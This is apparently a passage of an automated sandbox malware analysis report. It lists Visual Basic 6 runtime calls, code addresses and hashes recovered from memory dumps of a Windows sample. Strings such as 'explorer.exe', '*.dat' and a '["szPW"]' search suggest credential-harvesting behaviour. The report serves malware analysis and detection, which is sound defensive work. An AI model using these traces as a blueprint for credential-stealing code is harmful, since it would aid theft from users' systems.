                                                                                     • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$AnsiError$System$MoveUnicode$BstrCopy$#516#631List$Chkstk
                                                                                    • String ID: MGG$MGG$X1@
                                                                                    • API String ID: 3619963569-3990769864
                                                                                    • Opcode ID: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
                                                                                    • Instruction ID: cadc88f3378a5b8a7e488d7ed3a86a3d9527093b9cfaa094389870ae1251132b
                                                                                    • Opcode Fuzzy Hash: 940beab17d9b24f9990cadcffc4ef0ae816e00d13d285cc8866c0fad8e1e78f3
                                                                                    • Instruction Fuzzy Hash: 93D1ABB1900109EFDB04EFE0EE99EDEBB79EF48305F108169F602B6160DB756945CB64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 0042153E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00421546
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,00000000), ref: 0042154A
                                                                                    • #648.MSVBVM60(0000000A,?,00000000), ref: 00421562
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 00421571
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000000), ref: 00421583
                                                                                    • __vbaFileOpen.MSVBVM60(00000020,000000FF,00000000,?,00000000), ref: 0042158A
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421592
                                                                                    • #570.MSVBVM60(00000000,?,00000000), ref: 00421595
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215A2
                                                                                    • __vbaLenBstr.MSVBVM60(Function_0000545C,?,00000000), ref: 004215C7
                                                                                    • #525.MSVBVM60(00000000,?,00000000), ref: 004215CE
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 004215D9
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004215E1
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 004215E5
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004215ED
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 004215F6
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000), ref: 0042162F
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00421632
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 0042164F
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004217B1
                                                                                    • __vbaFileClose.MSVBVM60(00000000,?,00000000), ref: 004217BA
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004217BE
                                                                                    • __vbaPut3.MSVBVM60(00000004,?,00000000,?,00000000), ref: 004217C7
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 004217D5
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 0042161E
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000), ref: 00421604
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421663
                                                                                    • #570.MSVBVM60(00000000,?,00000000), ref: 00421666
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421679
                                                                                    • __vbaFileSeek.MSVBVM60(00000000,00000000,?,00000000), ref: 0042167D
                                                                                    • #648.MSVBVM60(0000000A,?,00000000), ref: 00421695
                                                                                    • __vbaFreeVar.MSVBVM60(?,00000000), ref: 004216A4
                                                                                    • __vbaI2I4.MSVBVM60(?,?,00000000), ref: 004216B0
                                                                                    • __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?,00000000), ref: 004216BA
                                                                                    • #525.MSVBVM60(00001000,?,00000000), ref: 004216C5
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 004216D0
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 004216D8
                                                                                    • #570.MSVBVM60(00000000,?,00000000), ref: 004216DB
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421712
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042171B
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421723
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042172C
                                                                                    • #598.MSVBVM60(?,00000000), ref: 00421744
                                                                                    • #525.MSVBVM60(-00000001,?,00000000), ref: 00421764
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0042176F
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421777
                                                                                    • __vbaGet3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421780
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421788
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 00421791
                                                                                    • #598.MSVBVM60(?,00000000), ref: 0042179E
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217E9
                                                                                      • Part of subcall function 00411210: #594.MSVBVM60(?,660E1A08,-00000001,660E6C30), ref: 0041127A
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60 ref: 00411283
                                                                                      • Part of subcall function 00411210: __vbaLenBstr.MSVBVM60 ref: 0041128F
                                                                                      • Part of subcall function 00411210: #631.MSVBVM60(?,?,0000000A), ref: 004112C8
                                                                                      • Part of subcall function 00411210: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 004112D3
                                                                                      • Part of subcall function 00411210: #516.MSVBVM60(00000000,?,?,0000000A), ref: 004112DA
                                                                                      • Part of subcall function 00411210: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 004112E9
                                                                                      • Part of subcall function 00411210: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 004112F2
                                                                                    • __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004217FD
                                                                                    • __vbaI2I4.MSVBVM60(?,00000000), ref: 00421805
                                                                                    • __vbaPut3.MSVBVM60(00000000,?,00000000,?,00000000), ref: 0042180E
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,00000000), ref: 00421822
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042182D
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421830
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00421839
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042184F
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421858
                                                                                    • __vbaI2I4.MSVBVM60 ref: 0042185D
                                                                                    • __vbaFileClose.MSVBVM60(00000000), ref: 00421860
                                                                                    • __vbaExitProc.MSVBVM60 ref: 00421869
                                                                                    • __vbaFreeStr.MSVBVM60(004218B2), ref: 004218A0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004218A5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004218AA
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004218AF
                                                                                    • __vbaErrorOverflow.MSVBVM60(?,00000000), ref: 004218C9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
                                                                                    • String ID:
                                                                                    • API String ID: 936154001-0
                                                                                    • Opcode ID: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
                                                                                    • Instruction ID: 6fbf1135f095249bf70c03af9044da0b22cab9efce2ca8aeaf0a64a19547a855
                                                                                    • Opcode Fuzzy Hash: 3aa9f9ede1c026c034044edf61044cbf9f29f764a31bed732f8cbd30b78298b1
                                                                                    • Instruction Fuzzy Hash: B7B11B75E002589FCB04EFE4DE88AEEBBB9EF48341F10412AE506E72A4DB785945CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(?,Function_000032B6), ref: 0040DC0E
                                                                                    • __vbaAryConstruct2.MSVBVM60(?,00408078,00000003,?,?,?,?,Function_000032B6), ref: 0040DC57
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,?,?,?,Function_000032B6), ref: 0040DC66
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DC7E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,Function_000032B6), ref: 0040DCA8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,Function_000032B6), ref: 0040DCD1
                                                                                      • Part of subcall function 00429F50: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,Function_000032B6), ref: 00429F6E
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429F9B
                                                                                      • Part of subcall function 00429F50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FA7
                                                                                      • Part of subcall function 00429F50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 00429FB6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 00429FCF
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 00429FDF
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 00429FED
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 00429FF6
                                                                                      • Part of subcall function 00429F50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,00403208,00000004,?,?,?,00000000,Function_000032B6), ref: 0042A015
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,Function_000032B6), ref: 0042A025
                                                                                      • Part of subcall function 00429F50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0042A033
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A03C
                                                                                      • Part of subcall function 00429F50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0042A052
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(0042A07C,?,?,?,00000000,Function_000032B6), ref: 0042A06C
                                                                                      • Part of subcall function 00429F50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0042A075
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                    • __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,Function_000032B6), ref: 0040DD2F
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,00000128), ref: 0040DD69
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040DD7F
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,00000128,?), ref: 0040DD98
                                                                                    • #525.MSVBVM60(00000104), ref: 0040DDC1
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DDCC
                                                                                    • __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040DE03
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0040DE42
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040DE5D
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040DE83
                                                                                    • __vbaStrToUnicode.MSVBVM60(?,?), ref: 0040DE94
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040DEA9
                                                                                    • #616.MSVBVM60(?,?), ref: 0040DEBE
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DECC
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040DEE6
                                                                                    • #517.MSVBVM60(00000000), ref: 0040DEED
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040DEF8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040DF0E
                                                                                    • __vbaLenBstr.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DF22
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040DF58
                                                                                    • __vbaStrCopy.MSVBVM60(?,?,Function_000032B6), ref: 0040DFC0
                                                                                    • __vbaStrMove.MSVBVM60(?,?,?,Function_000032B6), ref: 0040DFDA
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040DFF5
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,?,Function_000032B6), ref: 0040DFFC
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,?,?,Function_000032B6), ref: 0040E027
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040E04A
                                                                                    • __vbaStrCmp.MSVBVM60(00000000,?,?,?,Function_000032B6), ref: 0040E064
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0AB
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,?,?,Function_000032B6), ref: 0040E0C1
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(00405598,?,?,?,?,Function_000032B6), ref: 0040E0DA
                                                                                    • __vbaSetSystemError.MSVBVM60(?), ref: 0040E0FE
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E182
                                                                                    • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040E19B
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040E1BA
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040E1CC
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0E4,00000000), ref: 0040E242
                                                                                    • __vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040E25A
                                                                                    • #600.MSVBVM60(00000008,00000000), ref: 0040E279
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040E28B
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • #598.MSVBVM60 ref: 0040E298
                                                                                    • __vbaFreeStr.MSVBVM60(0040E305), ref: 0040E2DD
                                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0040E2F5
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040E2FE
                                                                                      • Part of subcall function 0041A090: __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,?,?,?,?,Function_000032B6), ref: 0041A0AE
                                                                                      • Part of subcall function 0041A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041A0DE
                                                                                      • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041A118
                                                                                      • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A141
                                                                                      • Part of subcall function 0041A090: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041A157
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Error$FreeMoveSystem$Copy$Ansi$Chkstk$Bstr$#525#580FileListUnicode$#570#600#616#648Open$#517#529#598BoundsConstruct2DestructGenerateGet3Get4Seek
                                                                                    • String ID: PR$ SE$>
                                                                                    • API String ID: 1583011778-1191765531
                                                                                    • Opcode ID: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
                                                                                    • Instruction ID: f905f382651ed8b103fe9430cada2d1d943483e90bd52cba87cb48a71c5da37b
                                                                                    • Opcode Fuzzy Hash: 45859f09e341b6f6bdbc91610b05257dc4f75515ba4226435016caa82a9c69b6
                                                                                    • Instruction Fuzzy Hash: F7122D75A01219EBDB14DFA0DE88BDE7BB4FF48304F1081A9E505B72A0DB785A85CF58
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BE27
                                                                                    • __vbaGenerateBoundsError.MSVBVM60 ref: 0041BE44
                                                                                    • __vbaStrCat.MSVBVM60(00000000,?), ref: 0041BE64
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BE72
                                                                                    • __vbaStrCat.MSVBVM60(00406544,00000000), ref: 0041BE7E
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BE89
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041BE95
                                                                                    • __vbaRecUniToAnsi.MSVBVM60(004055BC,?,?), ref: 0041BEB5
                                                                                    • __vbaStrCat.MSVBVM60(*.dat,?,00000000), ref: 0041BEC5
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BED3
                                                                                    • __vbaStrToAnsi.MSVBVM60(?,00000000), ref: 0041BEE1
                                                                                    • __vbaSetSystemError.MSVBVM60(00000000), ref: 0041BEF3
                                                                                    • __vbaRecAnsiToUni.MSVBVM60(004055BC,?,?), ref: 0041BF0C
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0041BF2B
                                                                                    • __vbaStrFixstr.MSVBVM60(00000104,?), ref: 0041BF58
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BF66
                                                                                    • __vbaStrMove.MSVBVM60(00000000), ref: 0041BF7A
                                                                                    • __vbaLsetFixstr.MSVBVM60(00000104,?,?), ref: 0041BF93
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BFB8
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041BFC4
                                                                                    • __vbaStrCat.MSVBVM60(?,?), ref: 0041BFD9
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041BFE7
                                                                                    • #578.MSVBVM60(00000000), ref: 0041BFEE
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C00D
                                                                                    • __vbaStrCat.MSVBVM60(?,?), ref: 0041C031
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0041C03F
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0041C056
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C062
                                                                                    • __vbaInStr.MSVBVM60(00000000,["szPW"],?,00000001), ref: 0041C07C
                                                                                    • __vbaInStr.MSVBVM60(00000000,004095E4,?,-00000008), ref: 0041C0B5
                                                                                    • __vbaInStr.MSVBVM60(00000000,004095E4,?,-00000001), ref: 0041C0EE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0041C353
                                                                                    • __vbaFreeStr.MSVBVM60(0041C3F0), ref: 0041C3B0
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3B9
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3C2
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0041C3CB
